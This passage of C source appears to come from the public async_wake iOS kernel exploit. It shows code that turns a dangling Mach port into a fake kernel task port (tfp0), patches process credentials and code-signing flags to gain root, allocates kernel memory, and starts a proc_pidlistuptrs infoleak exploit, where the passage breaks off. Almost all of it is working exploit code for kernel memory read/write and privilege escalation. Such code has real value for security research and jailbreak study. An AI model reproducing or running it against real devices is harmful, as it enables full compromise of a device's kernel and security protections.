331 | 332 | if (fake_port + fake_task_offset < body) { 333 | printf("the maths is wrong somewhere, fake task doesn't fit in message\n"); 334 | sleep(10); 335 | exit(EXIT_FAILURE); 336 | } 337 | 338 | uint8_t* fake_task = fake_port + fake_task_offset; 339 | 340 | // set the ref_count field of the fake task: 341 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 342 | 343 | // make sure the task is active 344 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 345 | 346 | // set the vm_map of the fake task: 347 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 348 | 349 | // set the task lock type of the fake task's lock: 350 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 351 | return body; 352 | } 353 | 354 | 355 | /* 356 | * the first tpf0 we get still hangs of the dangling port and is backed by a type-confused ipc_kmsg buffer 357 | * 358 | * use that tfp0 to build a safer one such that we can safely free everything this process created and exit 359 | * without leaking memory 360 | */ 361 | mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space) { 362 | kern_return_t err; 363 | 364 | mach_port_t tfp0 = MACH_PORT_NULL; 365 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &tfp0); 366 | if (err != KERN_SUCCESS) { 367 | printf("unable to allocate port\n"); 368 | } 369 | 370 | // build a fake struct task for the kernel task: 371 | //uint64_t fake_kernel_task_kaddr = kmem_alloc_wired(0x4000); 372 | uint64_t fake_kernel_task_kaddr = early_kalloc(0x1000); 373 | printf("fake_kernel_task_kaddr: %llx\n", fake_kernel_task_kaddr); 374 | 375 | 376 | void* fake_kernel_task = malloc(0x1000); 377 | memset(fake_kernel_task, 0, 0x1000); 378 | *(uint32_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 379 | *(uint32_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 380 | *(uint64_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 381 | *(uint8_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 382 | kmemcpy(fake_kernel_task_kaddr, (uint64_t) fake_kernel_task, 0x1000); 383 | free(fake_kernel_task); 384 | 385 | uint32_t fake_task_refs = rk32(fake_kernel_task_kaddr + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)); 386 | printf("read fake_task_refs: %x\n", fake_task_refs); 387 | if (fake_task_refs != 0xd00d) { 388 | printf("read back value didn't match...\n"); 389 | } 390 | 391 | // now make the changes to the port object to make it a task port: 392 | uint64_t port_kaddr = find_port_address(tfp0, MACH_MSG_TYPE_MAKE_SEND); 393 | 394 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_TASK); 395 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d); 396 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d); 397 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space); 398 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_kernel_task_kaddr); 399 | 400 | // swap our receive right for a send right: 401 | uint64_t task_port_addr = task_self_addr(); 402 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 403 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 404 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 405 | 406 | uint32_t port_index = tfp0 >> 8; 407 | const int 
sizeof_ipc_entry_t = 0x18; 408 | uint32_t bits = rk32(is_table + (port_index * sizeof_ipc_entry_t) + 8); // 8 = offset of ie_bits in struct ipc_entry 409 | 410 | #define IE_BITS_SEND (1<<16) 411 | #define IE_BITS_RECEIVE (1<<17) 412 | 413 | bits &= (~IE_BITS_RECEIVE); 414 | bits |= IE_BITS_SEND; 415 | 416 | wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, bits); 417 | 418 | printf("about to test new tfp0\n"); 419 | 420 | vm_offset_t data_out = 0; 421 | mach_msg_type_number_t out_size = 0; 422 | err = mach_vm_read(tfp0, vm_map, 0x40, &data_out, &out_size); 423 | if (err != KERN_SUCCESS) { 424 | printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err)); 425 | sleep(3); 426 | exit(EXIT_FAILURE); 427 | } 428 | 429 | printf("kernel read via second tfp0 port worked?\n"); 430 | printf("0x%016llx\n", *(uint64_t*)data_out); 431 | printf("0x%016llx\n", *(uint64_t*)(data_out+8)); 432 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x10)); 433 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x18)); 434 | 435 | return tfp0; 436 | } 437 | 438 | 439 | 440 | // task_self_addr points to the struct ipc_port for our task port 441 | uint64_t find_kernel_vm_map(uint64_t task_self_addr) { 442 | uint64_t struct_task = rk64(task_self_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 443 | 444 | while (struct_task != 0) { 445 | uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 446 | 447 | uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID)); 448 | 449 | if (pid == 0) { 450 | uint64_t vm_map = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)); 451 | return vm_map; 452 | } 453 | 454 | struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV)); 455 | } 456 | 457 | printf("unable to find kernel task...\n"); 458 | sleep(10); 459 | exit(EXIT_FAILURE); 460 | } 461 | 462 | const uint64_t context_magic = 0x1214161800000000; // a random constant 463 | const uint64_t initial_context = 0x1020304015253545; // another random constant 464 | 465 | mach_port_t get_kernel_memory_rw() { 466 | // offsets are required before we get r/w: 467 | offsets_init(); 468 | 469 | kern_return_t err; 470 | 471 | uint32_t MAX_KERNEL_TRAILER_SIZE = 0x44; 472 | uint32_t replacer_body_size = message_size_for_kalloc_size(4096) - sizeof(mach_msg_header_t); 473 | uint32_t message_body_offset = 0x1000 - replacer_body_size - MAX_KERNEL_TRAILER_SIZE; 474 | 475 | printf("message size for kalloc.4096: %d\n", message_size_for_kalloc_size(4096)); 476 | 477 | prepare_user_client(); 478 | 479 | uint64_t task_self = task_self_addr(); 480 | if (task_self == 0) { 481 | printf("unable to disclose address of our task port\n"); 482 | sleep(10); 483 | exit(EXIT_FAILURE); 484 | } 485 | printf("our task port is at 0x%llx\n", task_self); 486 | 487 | int n_pre_ports = 100000; //8000 488 | mach_port_t* pre_ports = prepare_ports(n_pre_ports); 489 | 490 | // make a bunch of smaller allocations in a different zone which can be collected later: 491 | uint32_t smaller_body_size = message_size_for_kalloc_size(1024) - sizeof(mach_msg_header_t); 492 | 493 | uint8_t* smaller_body = malloc(smaller_body_size); 494 | memset(smaller_body, 'C', smaller_body_size); 495 | 496 | const int n_smaller_ports = 600; // 150 MB 497 | mach_port_t smaller_ports[n_smaller_ports]; 498 | for (int i = 0; i < n_smaller_ports; i++) { 499 | smaller_ports[i] = send_kalloc_message(smaller_body, smaller_body_size); 500 | } 501 | 502 | // now find a suitable port 503 | // we'll replace the port with an ipc_kmsg buffer containing controlled 
data, but we don't 504 | // completely control all the data: 505 | // specifically we're targetting kalloc.4096 but the message body will only span 506 | // xxx448 -> xxxfbc so we want to make sure the port we target is within that range 507 | // actually, since we're also putting a fake task struct here and want 508 | // the task's bsd_info pointer to overlap with the ip_context field we need a stricter range 509 | 510 | 511 | int ports_to_test = 100; 512 | int base = n_pre_ports - 1000; 513 | 514 | mach_port_t first_port = MACH_PORT_NULL; 515 | uint64_t first_port_address = 0; 516 | 517 | for (int i = 0; i < ports_to_test; i++) { 518 | mach_port_t candidate_port = pre_ports[base+i]; 519 | uint64_t candidate_address = find_port_address(candidate_port, MACH_MSG_TYPE_MAKE_SEND); 520 | uint64_t page_offset = candidate_address & 0xfff; 521 | if (page_offset > 0xa00 && page_offset < 0xe80) { // this range could be wider but there's no need 522 | printf("found target port with suitable allocation page offset: 0x%016llx\n", candidate_address); 523 | pre_ports[base+i] = MACH_PORT_NULL; 524 | first_port = candidate_port; 525 | first_port_address = candidate_address; 526 | break; 527 | } 528 | } 529 | 530 | if (first_port == MACH_PORT_NULL) { 531 | printf("unable to find a candidate port with a suitable page offset\n"); 532 | exit(EXIT_FAILURE); 533 | } 534 | 535 | 536 | uint64_t* context_ptr = NULL; 537 | uint8_t* replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, 0, 0, &context_ptr); 538 | printf("replacer_body_size: 0x%x\n", replacer_body_size); 539 | printf("message_body_offset: 0x%x\n", message_body_offset); 540 | 541 | make_dangling(first_port); 542 | 543 | free_ports(pre_ports, n_pre_ports); 544 | 545 | // free the smaller ports, they will get gc'd later: 546 | for (int i = 0; i < n_smaller_ports; i++) { 547 | mach_port_destroy(mach_task_self(), smaller_ports[i]); 548 | } 549 | 550 | 551 | // now try to get that zone collected and reallocated as something controllable (kalloc.4096): 552 | 553 | const int replacer_ports_limit = 200; // about 200 MB 554 | mach_port_t replacer_ports[replacer_ports_limit]; 555 | memset(replacer_ports, 0, sizeof(replacer_ports)); 556 | uint32_t i; 557 | for (i = 0; i < replacer_ports_limit; i++) { 558 | uint64_t context_val = (context_magic)|i; 559 | *context_ptr = context_val; 560 | replacer_ports[i] = send_kalloc_message(replacer_message_body, replacer_body_size); 561 | 562 | // we want the GC to actually finish, so go slow... 
563 |     pthread_yield_np();
564 |     usleep(10000);
565 |     printf("%d\n", i);
566 |   }
567 | 
568 | 
569 |   // find out which replacer port it was
570 |   mach_port_context_t replacer_port_number = 0;
571 |   err = mach_port_get_context(mach_task_self(), first_port, &replacer_port_number);
572 |   if (err != KERN_SUCCESS) {
573 |     printf("unable to get context: %d %s\n", err, mach_error_string(err));
574 |     sleep(3);
575 |     exit(EXIT_FAILURE);
576 |   }
577 |   replacer_port_number &= 0xffffffff;
578 |   if (replacer_port_number >= (uint64_t)replacer_ports_limit) {
579 |     printf("suspicious context value, something's wrong %lx\n", replacer_port_number);
580 |     sleep(3);
581 |     exit(EXIT_FAILURE);
582 |   }
583 | 
584 |   printf("got replaced with replacer port %ld\n", replacer_port_number);
585 | 
586 |   prepare_rk_via_kmem_read_port(first_port);
587 | 
588 |   uint64_t kernel_vm_map = find_kernel_vm_map(task_self);
589 |   printf("found kernel vm_map: 0x%llx\n", kernel_vm_map);
590 | 
591 | 
592 |   // now free first replacer and put a fake kernel task port there
593 |   // we need to do this because the first time around we don't know the address
594 |   // of ipc_space_kernel which means we can't fake a port owned by the kernel
595 |   free(replacer_message_body);
596 |   replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, kernel_vm_map, ipc_space_kernel(), &context_ptr);
597 | 
598 |   // free the first replacer
599 |   mach_port_t replacer_port = replacer_ports[replacer_port_number];
600 |   replacer_ports[replacer_port_number] = MACH_PORT_NULL;
601 |   mach_port_destroy(mach_task_self(), replacer_port);
602 | 
603 |   const int n_second_replacer_ports = 10;
604 |   mach_port_t second_replacer_ports[n_second_replacer_ports];
605 | 
606 |   for (int i = 0; i < n_second_replacer_ports; i++) {
607 |     *context_ptr = i;
608 |     second_replacer_ports[i] = send_kalloc_message(replacer_message_body, replacer_body_size);
609 |   }
610 | 
611 |   // hopefully that worked the second time too!
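  // (the context value survives the replacement because build_message_payload points context_ptr
  //  at the offset in the message body which overlays the dangling port's ip_context field, so
  //  mach_port_get_context on the dangling port reads back whichever index we stamped into the
  //  replacer message that now sits on top of it)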
612 | // check the context: 613 | 614 | replacer_port_number = 0; 615 | err = mach_port_get_context(mach_task_self(), first_port, &replacer_port_number); 616 | if (err != KERN_SUCCESS) { 617 | printf("unable to get context: %d %s\n", err, mach_error_string(err)); 618 | sleep(3); 619 | exit(EXIT_FAILURE); 620 | } 621 | 622 | replacer_port_number &= 0xffffffff; 623 | if (replacer_port_number >= (uint64_t)n_second_replacer_ports) { 624 | printf("suspicious context value, something's wrong %lx\n", replacer_port_number); 625 | sleep(3); 626 | exit(EXIT_FAILURE); 627 | } 628 | 629 | printf("second time got replaced with replacer port %ld\n", replacer_port_number); 630 | 631 | // clear up the original replacer ports: 632 | for (int i = 0; i < replacer_ports_limit; i++) { 633 | mach_port_destroy(mach_task_self(), replacer_ports[i]); 634 | } 635 | 636 | // then clear up the second replacer ports (apart from the one in use) 637 | mach_port_t second_replacement_port = second_replacer_ports[replacer_port_number]; 638 | second_replacer_ports[replacer_port_number] = MACH_PORT_NULL; 639 | for (int i = 0; i < n_second_replacer_ports; i++) { 640 | mach_port_destroy(mach_task_self(), second_replacer_ports[i]); 641 | } 642 | 643 | printf("will try to read from second port (fake kernel)\n"); 644 | // try to read some kernel memory using the second port: 645 | vm_offset_t data_out = 0; 646 | mach_msg_type_number_t out_size = 0; 647 | err = mach_vm_read(first_port, kernel_vm_map, 0x40, &data_out, &out_size); 648 | if (err != KERN_SUCCESS) { 649 | printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err)); 650 | sleep(3); 651 | exit(EXIT_FAILURE); 652 | } 653 | 654 | printf("kernel read via fake kernel task port worked?\n"); 655 | printf("0x%016llx\n", *(uint64_t*)data_out); 656 | printf("0x%016llx\n", *(uint64_t*)(data_out+8)); 657 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x10)); 658 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x18)); 659 | 660 | prepare_rwk_via_tfp0(first_port); 661 | printf("about to build safer tfp0\n"); 662 | 663 | //early_kalloc(0x10000); 664 | //return 0; 665 | 666 | mach_port_t safer_tfp0 = build_safe_fake_tfp0(kernel_vm_map, ipc_space_kernel()); 667 | prepare_rwk_via_tfp0(safer_tfp0); 668 | 669 | printf("built safer tfp0\n"); 670 | printf("about to clear up\n"); 671 | 672 | // can now clean everything up 673 | wk32(first_port_address + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_NONE); 674 | wk64(first_port_address + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 675 | 676 | // first port will soon point to freed memory, so neuter it: 677 | uint64_t task_port_addr = task_self_addr(); 678 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 679 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 680 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 681 | 682 | uint32_t port_index = first_port >> 8; 683 | const int sizeof_ipc_entry_t = 0x18; 684 | 685 | // remove all rights 686 | wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, 0); 687 | 688 | // clear the ipc_port port too 689 | wk64(is_table + (port_index * sizeof_ipc_entry_t), 0); 690 | 691 | mach_port_destroy(mach_task_self(), second_replacement_port); 692 | printf("cleared up\n"); 693 | return safer_tfp0; 694 | } 695 | 696 | char* bundle_path() { 697 | CFBundleRef mainBundle = CFBundleGetMainBundle(); 698 | CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle); 699 | int len 
= 4096; 700 | char* path = malloc(len); 701 | 702 | CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len); 703 | 704 | return path; 705 | } 706 | 707 | /* thx ianbeer for async_wake 708 | proc_for_pid based on cheesecakeufo code 709 | find bsd_info from our own task_self_addr */ 710 | uint64_t proc_for_pid(uint32_t pid) { 711 | uint64_t task_self = task_self_addr(); 712 | uint64_t struct_task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 713 | 714 | while (struct_task != 0) { 715 | uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 716 | uint32_t fpid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID)); 717 | 718 | if (fpid == pid) { 719 | return bsd_info; 720 | } 721 | struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV)); 722 | } 723 | printf("unable to find bsd_info for given pid ...\n"); 724 | sleep(10); 725 | exit(EXIT_FAILURE); 726 | } 727 | 728 | uint64_t get_root(){ 729 | uint64_t bsd_task=proc_for_pid(getpid()); 730 | uint64_t cred = rk64(bsd_task+0x100); 731 | 732 | uint64_t credpatch = 0; 733 | uint64_t proc = bsd_task; 734 | while (proc) { 735 | uint32_t pid = rk32(proc+0x10); 736 | uint32_t csflags = rk32(proc+0x2a8); 737 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW; 738 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 739 | wk32(proc+0x2a8, csflags); 740 | if (pid == 0) { 741 | credpatch = rk64(proc+0x100); 742 | break; 743 | } 744 | proc = rk64(proc); 745 | } 746 | uint64_t orig_cred = cred; 747 | wk64(bsd_task+0x100, credpatch); 748 | printf("[INFO]: new uid: %d\n", getuid()); 749 | return orig_cred; 750 | } 751 | 752 | void unroot(uint64_t orig_cred){ 753 | uint64_t bsd_task=proc_for_pid(getpid()); 754 | wk64(bsd_task+0x100, orig_cred); 755 | printf("[INFO]: new uid: %d\n", getuid()); 756 | } 757 | 758 | mach_port_t go() { 759 | mach_port_t tfp0 = get_kernel_memory_rw(); 760 | printf("tfp0: %x\n", tfp0); 761 | 762 | /** 763 | 764 | We can now temporarily gain uid=0! I think we have to swap back to the old uid to prevent kernel panics though. 765 | 766 | Usage: 767 | - call get_root() and store the uid it returns. 768 | - do root stuff 769 | - setuid(old_uid) 770 | 771 | */ 772 | 773 | uint64_t orig_cred = get_root(); 774 | 775 | // do root stuff below 776 | 777 | /* 778 | To change your resolution: 779 | - Edit values in the .plist 780 | - Change the boolean below to true 781 | - Reboot 782 | 783 | You only have to do this once. 
BE CAREFUL, IT IS NOT MY FAULT IF YOU FUCK THIS UP 784 | */ 785 | bool shouldChangeResolution = false; 786 | 787 | if(shouldChangeResolution){ 788 | 789 | char ch; 790 | FILE *source, *target; 791 | char* path; 792 | asprintf(&path, "%s/com.apple.iokit.IOMobileGraphicsFamily.plist", bundle_path()); 793 | source = fopen(path, "r"); 794 | target = fopen("/var/mobile/Library/Preferences/com.apple.iokit.IOMobileGraphicsFamily.plist", "w"); 795 | 796 | while( ( ch = fgetc(source) ) != EOF ) 797 | fputc(ch, target); 798 | 799 | printf("Resolution changed, please reboot.\n"); 800 | fclose(source); 801 | fclose(target); 802 | } 803 | 804 | //set uid back 805 | unroot(orig_cred); 806 | sleep(2); 807 | 808 | if (probably_have_correct_symbols()) { 809 | printf("have symbols for this device, testing the kernel debugger...\n"); 810 | test_kdbg(); 811 | } 812 | 813 | return tfp0; 814 | } 815 | -------------------------------------------------------------------------------- /async_wake_ios/async_wake.h: -------------------------------------------------------------------------------- 1 | #ifndef async_wake_h 2 | #define async_wake_h 3 | 4 | #include 5 | mach_port_t go(void); 6 | 7 | #define CS_VALID 0x0000001 /* dynamically valid */ 8 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 9 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 10 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 11 | 12 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 13 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 14 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 15 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 16 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 17 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 18 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 19 | 20 | #define CS_ALLOWED_MACHO 0x00ffffe 21 | 22 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 23 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 24 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 25 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 26 | 27 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 28 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 29 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 30 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 31 | 32 | #endif /* async_wake_h */ 33 | -------------------------------------------------------------------------------- /async_wake_ios/com.apple.iokit.IOMobileGraphicsFamily.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | canvas_height 6 | 1136 7 | canvas_width 8 | 640 9 | 10 | 11 | -------------------------------------------------------------------------------- /async_wake_ios/early_kalloc.c: -------------------------------------------------------------------------------- 1 | // 2 | // early_kalloc.c 3 | // async_wake_ios 4 | // 5 | // Created by Ian Beer on 12/11/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 
7 | // 8 | 9 | #include "early_kalloc.h" 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include "find_port.h" 16 | #include "kmem.h" 17 | #include "symbols.h" 18 | 19 | extern int message_size_for_kalloc_size(int kalloc_size); 20 | 21 | // get a kalloc allocation before we've got a kcall interface to just call it 22 | uint64_t early_kalloc(int size) { 23 | mach_port_t port = MACH_PORT_NULL; 24 | kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 25 | if (err != KERN_SUCCESS) { 26 | printf("unable to allocate port\n"); 27 | } 28 | 29 | uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND); 30 | 31 | struct simple_msg { 32 | mach_msg_header_t hdr; 33 | char buf[0]; 34 | }; 35 | 36 | mach_msg_size_t msg_size = message_size_for_kalloc_size(size); 37 | struct simple_msg* msg = malloc(msg_size); 38 | memset(msg, 0, msg_size); 39 | 40 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 41 | msg->hdr.msgh_size = msg_size; 42 | msg->hdr.msgh_remote_port = port; 43 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 44 | msg->hdr.msgh_id = 0x41414142; 45 | 46 | err = mach_msg(&msg->hdr, 47 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 48 | msg_size, 49 | 0, 50 | MACH_PORT_NULL, 51 | MACH_MSG_TIMEOUT_NONE, 52 | MACH_PORT_NULL); 53 | 54 | if (err != KERN_SUCCESS) { 55 | printf("early kalloc failed to send message\n"); 56 | } 57 | 58 | // find the message buffer: 59 | 60 | uint64_t message_buffer = rk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE)); 61 | printf("message buffer: %llx\n", message_buffer); 62 | 63 | // leak the message buffer: 64 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0); 65 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit 66 | 67 | 68 | return message_buffer; 69 | } 70 | -------------------------------------------------------------------------------- /async_wake_ios/early_kalloc.h: -------------------------------------------------------------------------------- 1 | #ifndef early_kalloc_h 2 | #define early_kalloc_h 3 | 4 | #include 5 | 6 | uint64_t early_kalloc(int size); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /async_wake_ios/find_port.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include "find_port.h" 8 | #include "kmem.h" 9 | #include "symbols.h" 10 | #include "kutils.h" 11 | 12 | /* 13 | * this is an exploit for the proc_pidlistuptrs bug (P0 issue 1372) 14 | * 15 | * It will reliably determine the kernel address of a mach port. 16 | * Knowing the addresses of ports makes the other UaF exploit much simpler. 
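 *
 * In outline: spray out-of-line port descriptors so the kernel fills kalloc buffers with the
 * target port's ipc_port pointer, free them, then call proc_list_uptrs with a buffer size chosen
 * so that its kalloc allocation reuses one of those freed buffers; the 7 trailing bytes it leaves
 * uninitialized (but still copies out to userspace) hold most of a stale port pointer.
 * The most frequently seen plausible value is taken as the port's address.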
17 | */ 18 | 19 | // missing headers 20 | #define KEVENT_FLAG_WORKLOOP 0x400 21 | 22 | typedef uint64_t kqueue_id_t; 23 | 24 | struct kevent_qos_s { 25 | uint64_t ident; /* identifier for this event */ 26 | int16_t filter; /* filter for event */ 27 | uint16_t flags; /* general flags */ 28 | uint32_t qos; /* quality of service when servicing event */ 29 | uint64_t udata; /* opaque user data identifier */ 30 | uint32_t fflags; /* filter-specific flags */ 31 | uint32_t xflags; /* extra filter-specific flags */ 32 | int64_t data; /* filter-specific data */ 33 | uint64_t ext[4]; /* filter-specific extensions */ 34 | }; 35 | 36 | #define PRIVATE 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | struct kevent_extinfo { 43 | struct kevent_qos_s kqext_kev; 44 | uint64_t kqext_sdata; 45 | int kqext_status; 46 | int kqext_sfflags; 47 | uint64_t kqext_reserved[2]; 48 | }; 49 | 50 | extern int kevent_id(uint64_t id, const struct kevent_qos_s *changelist, int nchanges, struct kevent_qos_s *eventlist, int nevents, void *data_out, size_t *data_available, unsigned int flags); 51 | 52 | int proc_list_uptrs(pid_t pid, uint64_t *buffer, uint32_t buffersize); 53 | 54 | // appends n_events user events onto this process's kevent queue 55 | static void fill_events(int n_events) { 56 | struct kevent_qos_s events_id[] = {{ 57 | .filter = EVFILT_USER, 58 | .ident = 1, 59 | .flags = EV_ADD, 60 | .udata = 0x2345 61 | }}; 62 | 63 | kqueue_id_t id = 0x1234; 64 | 65 | for (int i = 0; i < n_events; i++) { 66 | int err = kevent_id(id, events_id, 1, NULL, 0, NULL, NULL, 67 | KEVENT_FLAG_WORKLOOP | KEVENT_FLAG_IMMEDIATE); 68 | 69 | if (err != 0) { 70 | printf(" [-] failed to enqueue user event\n"); 71 | exit(EXIT_FAILURE); 72 | } 73 | 74 | events_id[0].ident++; 75 | } 76 | } 77 | 78 | int kqueues_allocated = 0; 79 | 80 | static void prepare_kqueue() { 81 | // ensure there are a large number of events so that kevent_proc_copy_uptrs 82 | // always returns a large number 83 | if (kqueues_allocated) { 84 | return; 85 | } 86 | fill_events(10000); 87 | printf(" [+] prepared kqueue\n"); 88 | kqueues_allocated = 1; 89 | } 90 | 91 | // will make a kalloc allocation of (count*8)+7 92 | // and only write to the first (count*8) bytes. 
93 | // the return value is those last 7 bytes uninitialized bytes as a uint64_t 94 | // (the upper byte will be set to 0) 95 | static uint64_t try_leak(int count) { 96 | int buf_size = (count*8)+7; 97 | char* buf = calloc(buf_size+1, 1); 98 | 99 | int err = proc_list_uptrs(getpid(), (void*)buf, buf_size); 100 | 101 | if (err == -1) { 102 | return 0; 103 | } 104 | 105 | // the last 7 bytes will contain the leaked data: 106 | uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc 107 | 108 | return last_val; 109 | } 110 | 111 | struct ool_msg { 112 | mach_msg_header_t hdr; 113 | mach_msg_body_t body; 114 | mach_msg_ool_ports_descriptor_t ool_ports; 115 | }; 116 | 117 | // fills a kalloc allocation with count times of target_port's struct ipc_port pointer 118 | // To cause the kalloc allocation to be free'd mach_port_destroy the returned receive right 119 | static mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) { 120 | // allocate a port to send the message to 121 | mach_port_t q = MACH_PORT_NULL; 122 | kern_return_t err; 123 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 124 | if (err != KERN_SUCCESS) { 125 | printf(" [-] failed to allocate port\n"); 126 | exit(EXIT_FAILURE); 127 | } 128 | 129 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count); 130 | for (int i = 0; i < count; i++) { 131 | ports[i] = target_port; 132 | } 133 | 134 | struct ool_msg* msg = calloc(1, sizeof(struct ool_msg)); 135 | 136 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 137 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg); 138 | msg->hdr.msgh_remote_port = q; 139 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 140 | msg->hdr.msgh_id = 0x41414141; 141 | 142 | msg->body.msgh_descriptor_count = 1; 143 | 144 | msg->ool_ports.address = ports; 145 | msg->ool_ports.count = count; 146 | msg->ool_ports.deallocate = 0; 147 | msg->ool_ports.disposition = disposition; 148 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 149 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY; 150 | 151 | err = mach_msg(&msg->hdr, 152 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 153 | (mach_msg_size_t)sizeof(struct ool_msg), 154 | 0, 155 | MACH_PORT_NULL, 156 | MACH_MSG_TIMEOUT_NONE, 157 | MACH_PORT_NULL); 158 | 159 | if (err != KERN_SUCCESS) { 160 | printf(" [-] failed to send message: %s\n", 